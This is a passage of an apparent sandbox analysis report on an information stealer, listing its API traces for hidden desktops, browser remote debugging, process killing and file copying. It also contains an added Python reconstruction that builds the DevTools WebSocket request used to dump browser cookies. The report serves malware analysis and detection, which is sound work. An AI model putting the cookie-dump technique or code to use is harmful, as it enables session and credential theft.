                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                  • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 3860919712-2388001722
                                  • Opcode ID: 79ca529e4046b7185f239fbf2c5ae2d32d19a528eafcb29e5c62ad53cea9bb75
                                  • Instruction ID: 731493f861e5dabd38fcc3cb0b91f0a35fa55425c35f941fcd142f8e7b66519f
                                  • Opcode Fuzzy Hash: 79ca529e4046b7185f239fbf2c5ae2d32d19a528eafcb29e5c62ad53cea9bb75
                                  • Instruction Fuzzy Hash: E9C16271A102199FDB29DF64DC89AEE7779BF58300F044598F509A7290DF30AE99CFA0
                                  APIs
                                  • memset.MSVCRT ref: 00309790
                                  • lstrcat.KERNEL32(?,?), ref: 003097A0
                                  • lstrcat.KERNEL32(?,?), ref: 003097B1
                                  • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003097C3
                                  • memset.MSVCRT ref: 003097D7
                                    • Part of subcall function 00323E70: lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00323EA5
                                    • Part of subcall function 00323E70: lstrcpy.KERNEL32(00000000,01029B48), ref: 00323ECF
                                    • Part of subcall function 00323E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0030134E,?,0000001A), ref: 00323ED9
                                  • wsprintfA.USER32 ref: 00309806
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00309827
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00309844
                                    • Part of subcall function 003246A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003246B9
                                    • Part of subcall function 003246A0: Process32First.KERNEL32(00000000,00000128), ref: 003246C9
                                    • Part of subcall function 003246A0: Process32Next.KERNEL32(00000000,00000128), ref: 003246DB
                                    • Part of subcall function 003246A0: StrCmpCA.SHLWAPI(?,?), ref: 003246ED
                                    • Part of subcall function 003246A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00324702
                                    • Part of subcall function 003246A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00324711
                                    • Part of subcall function 003246A0: CloseHandle.KERNEL32(00000000), ref: 00324718
                                    • Part of subcall function 003246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00324726
                                    • Part of subcall function 003246A0: CloseHandle.KERNEL32(00000000), ref: 00324731
                                  • memset.MSVCRT ref: 00309862
                                  • lstrcat.KERNEL32(00000000,?), ref: 00309878
                                  • lstrcat.KERNEL32(00000000,?), ref: 00309889
                                  • lstrcat.KERNEL32(00000000,00334B60), ref: 0030989B
                                  • memset.MSVCRT ref: 003098AF
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003098D4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00309903
                                  • StrStrA.SHLWAPI(00000000,0102E048), ref: 00309919
                                  • lstrcpyn.KERNEL32(005393D0,00000000,00000000), ref: 00309938
                                  • lstrlen.KERNEL32(?), ref: 0030994B
                                  • wsprintfA.USER32 ref: 0030995B
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00309971
                                  • memset.MSVCRT ref: 00309986
                                  • Sleep.KERNEL32(00001388), ref: 003099E7
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                    • Part of subcall function 003092B0: strlen.MSVCRT ref: 003092E1
                                    • Part of subcall function 003092B0: strlen.MSVCRT ref: 003092FA
                                    • Part of subcall function 003092B0: strlen.MSVCRT ref: 00309399
                                    • Part of subcall function 003092B0: strlen.MSVCRT ref: 003093E6
                                    • Part of subcall function 00324740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00324759
                                    • Part of subcall function 00324740: Process32First.KERNEL32(00000000,00000128), ref: 00324769
                                    • Part of subcall function 00324740: Process32Next.KERNEL32(00000000,00000128), ref: 0032477B
                                    • Part of subcall function 00324740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0032479C
                                    • Part of subcall function 00324740: TerminateProcess.KERNEL32(00000000,00000000), ref: 003247AB
                                    • Part of subcall function 00324740: CloseHandle.KERNEL32(00000000), ref: 003247B2
                                    • Part of subcall function 00324740: Process32Next.KERNEL32(00000000,00000128), ref: 003247C0
                                    • Part of subcall function 00324740: CloseHandle.KERNEL32(00000000), ref: 003247CB
                                  • CloseDesktop.USER32(?), ref: 00309A1C
                                  Similarity
                                  • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 2040986984-1862457068
                                  • Opcode ID: c98b71cb11d964b624acf55c826e793ccf4156cfdf22087b7d4b7d6828d02569
                                  • Instruction ID: bce8932ab8ffe3971fa82effc9d9b5b92d728034e6a0a12c2f76451730efc85e
                                  • Opcode Fuzzy Hash: c98b71cb11d964b624acf55c826e793ccf4156cfdf22087b7d4b7d6828d02569
                                  • Instruction Fuzzy Hash: 699177B1A10218AFDB15DF74DC89FEE77B8AF54700F104555F609AB291DF70AA48CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00311291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003112B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003112BF
                                  • lstrlen.KERNEL32(00334CA8), ref: 003112CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003112E7
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 003112F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0031133A
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031135C
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 00311376
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003113AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003113D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003113E2
                                  • lstrlen.KERNEL32(00331794), ref: 003113ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031140A
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311416
                                  • lstrlen.KERNEL32(?), ref: 00311423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00311451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031147A
                                  • StrCmpCA.SHLWAPI(?,0102CAB0), ref: 003114A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003114E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311535
                                  • StrCmpCA.SHLWAPI(?,0102D328), ref: 00311552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003115BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003115E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003117BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003117F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0031181C
                                  • FindClose.KERNEL32(00000000), ref: 0031182B
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 052c87f4d59c325a38f265cb7d503dca63e9a1e0db4ab814f87faeddc5a6f89f
                                  • Instruction ID: 08270e82f904e59df4514ce905fb8697c2b83c807a30f90c06f00274383672a4
                                  • Opcode Fuzzy Hash: 052c87f4d59c325a38f265cb7d503dca63e9a1e0db4ab814f87faeddc5a6f89f
                                  • Instruction Fuzzy Hash: 78C18E71A116069BCB26EF78DC99AEF77B8AF18300F054428F946A7291DF34DC59CB90
                                  APIs
                                  • wsprintfA.USER32 ref: 0031E22C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0031E243
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031E263
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0031E27D
                                  • wsprintfA.USER32 ref: 0031E2A2
                                  • StrCmpCA.SHLWAPI(?,0032CFEC), ref: 0031E2B4
                                  • wsprintfA.USER32 ref: 0031E2D1
                                    • Part of subcall function 0031EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0031EE12
                                  • wsprintfA.USER32 ref: 0031E2F0
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 0031E304
                                  • lstrcat.KERNEL32(?,0102E2A8), ref: 0031E335
                                  • lstrcat.KERNEL32(?,00331794), ref: 0031E347
                                  • lstrcat.KERNEL32(?,?), ref: 0031E358
                                  • lstrcat.KERNEL32(?,00331794), ref: 0031E36A
                                  • lstrcat.KERNEL32(?,?), ref: 0031E37E
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0031E394
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E3D2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E422
                                  • DeleteFileA.KERNEL32(?), ref: 0031E45C
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0031E49B
                                  • FindClose.KERNEL32(00000000), ref: 0031E4AA
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 1375681507-2848263008
                                  • Opcode ID: 055a91f5e48018cd0f2943d28014ee96ccbc8b1d4928f262a726492328f8ecb8
                                  • Instruction ID: fe740b6152c7cb8f7be409cc7c553623af4ba3549d2ae819aa2da49bd6d99f2f
                                  • Opcode Fuzzy Hash: 055a91f5e48018cd0f2943d28014ee96ccbc8b1d4928f262a726492328f8ecb8
                                  • Instruction Fuzzy Hash: 428194719002199BCB25EF64DC89AEF77B8BF58300F044998F91A97290DF75AA58CF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003016E2
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00301719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030176C
                                  • lstrcat.KERNEL32(00000000), ref: 00301776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003017A2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003018F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003018FE
                                  Similarity
                                  • API ID: lstrcpy$lstrcat
                                  • String ID: \*.*
                                  • API String ID: 2276651480-1173974218
                                  • Opcode ID: 953eff04d362e3f72afaed13c2e2904f5c745dc4a21140249c69d325feaac19e
                                  • Instruction ID: dbb7e83f6806dbb671df64f394f1924b34a520f4f653763f14b81a2ea0b7bc13
                                  • Opcode Fuzzy Hash: 953eff04d362e3f72afaed13c2e2904f5c745dc4a21140249c69d325feaac19e
                                  • Instruction Fuzzy Hash: E4816571A122169BCB23EFA8D9A9AAF77B4AF14700F050114F805AB2D1DF30DD15DBD1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0031DD45
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0031DD4C
                                  • wsprintfA.USER32 ref: 0031DD62
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0031DD79
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031DD9C
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0031DDB6
                                  • wsprintfA.USER32 ref: 0031DDD4
                                  • DeleteFileA.KERNEL32(?), ref: 0031DE20
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0031DDED
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                    • Part of subcall function 0031D980: memset.MSVCRT ref: 0031D9A1
                                    • Part of subcall function 0031D980: memset.MSVCRT ref: 0031D9B3
                                    • Part of subcall function 0031D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031D9DB
                                    • Part of subcall function 0031D980: lstrcpy.KERNEL32(00000000,?), ref: 0031DA0E
                                    • Part of subcall function 0031D980: lstrcat.KERNEL32(?,00000000), ref: 0031DA1C
                                    • Part of subcall function 0031D980: lstrcat.KERNEL32(?,0102DF10), ref: 0031DA36
                                    • Part of subcall function 0031D980: lstrcat.KERNEL32(?,?), ref: 0031DA4A
                                    • Part of subcall function 0031D980: lstrcat.KERNEL32(?,0102CB10), ref: 0031DA5E
                                    • Part of subcall function 0031D980: lstrcpy.KERNEL32(00000000,?), ref: 0031DA8E
                                    • Part of subcall function 0031D980: GetFileAttributesA.KERNEL32(00000000), ref: 0031DA95
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0031DE2E
                                  • FindClose.KERNEL32(00000000), ref: 0031DE3D
                                  • lstrcat.KERNEL32(?,0102E2A8), ref: 0031DE66
                                  • lstrcat.KERNEL32(?,0102D248), ref: 0031DE7A
                                  • lstrlen.KERNEL32(?), ref: 0031DE84
                                  • lstrlen.KERNEL32(?), ref: 0031DE92
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031DED2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 4184593125-2848263008
                                  • Opcode ID: aea79d458c7e8c5f39da6f7a6c10f53a95addd719deb862117ea8f178f5b612b
                                  • Instruction ID: 308808a5e271dd3da9eb0de73d435ec988fb571f8fda04adf97b571b1e0bde81
                                  • Opcode Fuzzy Hash: aea79d458c7e8c5f39da6f7a6c10f53a95addd719deb862117ea8f178f5b612b
                                  • Instruction Fuzzy Hash: B9615F71A10208ABCB25EF74DC89AEE77B9BF58300F0445A8F50697391DF34AA58DF90
                                  APIs
                                  • wsprintfA.USER32 ref: 0031D54D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0031D564
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031D584
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0031D59E
                                  • lstrcat.KERNEL32(?,0102E2A8), ref: 0031D5E3
                                  • lstrcat.KERNEL32(?,0102E348), ref: 0031D5F7
                                  • lstrcat.KERNEL32(?,?), ref: 0031D60B
                                  • lstrcat.KERNEL32(?,?), ref: 0031D61C
                                  • lstrcat.KERNEL32(?,00331794), ref: 0031D62E
                                  • lstrcat.KERNEL32(?,?), ref: 0031D642
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031D682
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031D6D2
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0031D737
                                  • FindClose.KERNEL32(00000000), ref: 0031D746
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: same set of associated memory dumps as listed above (identical list)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 50252434-4073750446
                                  • Opcode ID: a588ca6212e4c2cc6668438b45746e6eca985b9680e63258637959bb6b7d30d4
                                  • Instruction ID: a19f91322dc98bc1bfe232fcbb3aa52a7983a9571def4fb54d2adf8605111424
                                  • Opcode Fuzzy Hash: a588ca6212e4c2cc6668438b45746e6eca985b9680e63258637959bb6b7d30d4
                                  • Instruction Fuzzy Hash: 576163B19102199BCB25EF74DC88AEE77B8AF59300F0045A5F549A7391DF34AA98CF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: same set of associated memory dumps as listed above (identical list)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                  • API String ID: 909987262-758292691
                                  • Opcode ID: a0a9b49ae8442c0dda119d1da9bfd3ace4c400353f220c00c897a1d16833b16b
                                  • Instruction ID: 68a538497cca5368297a51266ff28d2e92de4a9f848b550527dd55065c5c4776
                                  • Opcode Fuzzy Hash: a0a9b49ae8442c0dda119d1da9bfd3ace4c400353f220c00c897a1d16833b16b
                                  • Instruction Fuzzy Hash: B9A25871E012699FDF25DFA8D8907EDBBB6AF48300F1485A9E508A7281DB705F85CF90
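Analyst note on the strings above (added example, not part of the report or of the sample's own code): the fragments `Connection: Upgrade`, `Upgrade: websocket`, `Sec-WebSocket-Key:`, `Sec-WebSocket-Version: 13`, ` HTTP/1.1`, `Host:`, `ws://` and `{"id":1,"method":"Storage.getCookies"}` are the pieces of a hand-rolled WebSocket client talking to a Chrome DevTools Protocol endpoint; `Storage.getCookies` makes the browser hand over the cookies of the attached session through the debugging channel instead of the stealer having to read the encrypted cookie database. The Python below is my reconstruction of that exchange for analysts who need to recognise it on the wire: it assembles the Upgrade request from the fragments, computes the `Sec-WebSocket-Accept` value a server must answer with (RFC 6455 section 4.2.2), and masks and unmasks the client text frame carrying the JSON so a capture can be checked for this call. Host, port, path and mask bytes are constructed placeholders, and the header order is my choice; neither is recoverable from the strings.

```python
import base64
import hashlib
import json
import os
import struct
from typing import Optional

# Fixed GUID from RFC 6455 section 4.2.2; the server hashes key+GUID for Sec-WebSocket-Accept.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

# The JSON-RPC call recovered from the sample's strings: asks the DevTools
# endpoint for every cookie of the attached browser session.
CDP_GET_COOKIES = {"id": 1, "method": "Storage.getCookies"}


def build_upgrade_request(host: str, port: int, path: str, key_b64: str) -> bytes:
    """Assemble the HTTP/1.1 Upgrade request from the header fragments in the strings above.

    Header order is my choice; it is not recoverable from the fragments.
    """
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}:{port}",
        "Connection: Upgrade",
        "Upgrade: websocket",
        f"Sec-WebSocket-Key: {key_b64}",
        "Sec-WebSocket-Version: 13",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def expected_accept(key_b64: str) -> str:
    """Sec-WebSocket-Accept value a compliant server returns for this client key."""
    return base64.b64encode(hashlib.sha1((key_b64 + WS_GUID).encode()).digest()).decode()


def accept_from_response(raw: bytes) -> str:
    """Sec-WebSocket-Accept header of a 101 response, or '' if the upgrade was refused."""
    head = raw.partition(b"\r\n\r\n")[0].decode(errors="replace").split("\r\n")
    if not head or not head[0].startswith("HTTP/1.1 101"):
        return ""
    for line in head[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "sec-websocket-accept":
            return value.strip()
    return ""


def encode_client_frame(payload: bytes, mask: bytes) -> bytes:
    """One text frame as a client must send it: FIN set, opcode 1, MASK bit set, 4-byte mask."""
    n = len(payload)
    if n < 126:
        header = bytes([0x81, 0x80 | n])
    elif n < 1 << 16:
        header = bytes([0x81, 0x80 | 126]) + struct.pack(">H", n)
    else:
        header = bytes([0x81, 0x80 | 127]) + struct.pack(">Q", n)
    return header + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(payload))


def decode_client_frame(frame: bytes) -> bytes:
    """Unmask a single client-to-server text frame (no continuation-frame handling)."""
    if frame[0] & 0x0F != 0x1 or not frame[1] & 0x80:
        raise ValueError("not a masked text frame")
    n, pos = frame[1] & 0x7F, 2
    if n == 126:
        n, pos = struct.unpack(">H", frame[2:4])[0], 4
    elif n == 127:
        n, pos = struct.unpack(">Q", frame[2:10])[0], 10
    mask, data = frame[pos:pos + 4], frame[pos + 4:pos + 4 + n]
    return bytes(b ^ mask[i % 4] for i, b in enumerate(data))


def is_cookie_dump_request(frame: bytes) -> bool:
    """Detection check for a capture: does this client frame carry Storage.getCookies?"""
    try:
        msg = json.loads(decode_client_frame(frame))
    except (ValueError, IndexError):
        return False
    return isinstance(msg, dict) and msg.get("method") == "Storage.getCookies"


def cookie_dump_frame(mask: Optional[bytes] = None) -> bytes:
    """The frame the sample's JSON produces on the wire (random mask unless one is given)."""
    body = json.dumps(CDP_GET_COOKIES, separators=(",", ":")).encode()
    return encode_client_frame(body, mask or os.urandom(4))
```

On a capture, run `is_cookie_dump_request` over each client-to-server frame that follows a `101 Switching Protocols` response whose `Sec-WebSocket-Accept` matches `expected_accept` of the client's key. The RFC 6455 section 5.7 masking vector (`Hello` under mask `37 fa 21 3d`) round-trips through `encode_client_frame` and `decode_client_frame`, which is a quick sanity check for the framing code before pointing it at real traffic.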
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003123D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003123F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00312402
                                  • lstrlen.KERNEL32(\*.*), ref: 0031240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00312436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00312486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: same set of associated memory dumps as listed above (identical list)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: 0b9f5f1a9d20ada7c489c3df737d1f4428edd7c1ba7d4ad3f69dc33a92222df7
                                  • Instruction ID: 2926e60272190065f2323d9dc21121b1c39fce17e130c489156a164f506a9679
                                  • Opcode Fuzzy Hash: 0b9f5f1a9d20ada7c489c3df737d1f4428edd7c1ba7d4ad3f69dc33a92222df7
                                  • Instruction Fuzzy Hash: 89416E316126198BCB33EF68DD99ADF77B4AF14300F055124F85A9B292CF70DC698B90
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003246B9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 003246C9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 003246DB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 003246ED
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00324702
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00324711
                                  • CloseHandle.KERNEL32(00000000), ref: 00324718
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00324726
                                  • CloseHandle.KERNEL32(00000000), ref: 00324731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: same set of associated memory dumps as listed above (identical list)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 8bf410cf2f2cc03348b542a5428178b676dfc682cc536a6bdd1015fb44c6cf07
                                  • Instruction ID: 3b8a723f8db869f4b0db898324c10454492e8bed8513201e15bd8b19bb53379b
                                  • Opcode Fuzzy Hash: 8bf410cf2f2cc03348b542a5428178b676dfc682cc536a6bdd1015fb44c6cf07
                                  • Instruction Fuzzy Hash: 5401F9716012246BE7255B64EC8CFFE377CEB55B01F000088F905D2280EFB499589F60
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00324628
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00324638
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0032464A
                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00324660
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00324672
                                  • CloseHandle.KERNEL32(00000000), ref: 0032467D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: same set of associated memory dumps as listed above (identical list)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID: steam.exe
                                  • API String ID: 2284531361-2826358650
                                  • Opcode ID: 65a739effa4b2be1f5f3fa7f8d24d7490798ba3ae918787549cd5243c14653a2
                                  • Instruction ID: fa00e17c524b542816960368a187d6bc02f304db0a8153a9e320809c0eb2faeb
                                  • Opcode Fuzzy Hash: 65a739effa4b2be1f5f3fa7f8d24d7490798ba3ae918787549cd5243c14653a2
                                  • Instruction Fuzzy Hash: F50162716012249BE7259B60AC89FEA77BCEF19750F0401D5F908D1240EFB499989BE5
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00314B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00314B7F
                                  • lstrlen.KERNEL32(00334CA8), ref: 00314B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314BA7
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 00314BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00314BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: same set of associated memory dumps as listed above (identical list)
                                  Joe Sandbox IDA Plugin
